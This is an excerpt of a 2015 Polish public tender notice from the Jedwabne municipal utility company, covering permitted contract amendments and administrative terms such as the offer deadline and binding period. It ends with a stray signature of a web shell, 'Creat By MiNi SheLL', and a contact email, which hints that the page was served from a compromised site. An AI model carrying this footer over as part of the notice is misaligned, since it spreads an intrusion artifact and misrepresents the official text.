<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się możliwość zmiany postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1)	Zamawiający dopuszcza zmiany osób, o których mowa w § 10 ust. 2 pkt 2-3, w przypadku gdy dotychczasowe osoby nie mogą wykonywać powierzonych zadań, przy czym nowa osoba musi spełniać wymogi określone w SIWZ.
2)	Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu zamówienia o czas opóźnienia, jeżeli takie opóźnienie ma lub będzie miało wpływ na wykonanie przedmiotu zamówienia w przypadku:
a)	zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy,
b)	szczególnie niesprzyjających warunków atmosferycznych, uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, o ile nie dało się tego przewidzieć i / lub wykonać w innym terminie,
c)	siły wyższej lub klęski żywiołowej.
3)	W przypadku wykonywania robót zamiennych lub ograniczenia zakresu rzeczowego przedmiotu zamówienia, o czym mowa w SIWZ rozdz. XVIII pkt 1 i 2, z zastrzeżeniem nieprzekroczenia części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ - zmiana może dotyczyć wynagrodzenia, wymogów w zakresie odbioru robót, terminu wykonania i innych okoliczności powstałych w związku z robotami zamiennymi lub ograniczeniem zakresu rzeczowego przedmiotu zamówienia.
4)	W przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedwabne.powiatlomzynski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Jedwabnem,
ul. Mickiewicza 4,
18-420 Jedwabne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2015 godzina 10:00, miejsce: Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Jedwabnem,
ul. Mickiewicza 4,
18-420 Jedwabne
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com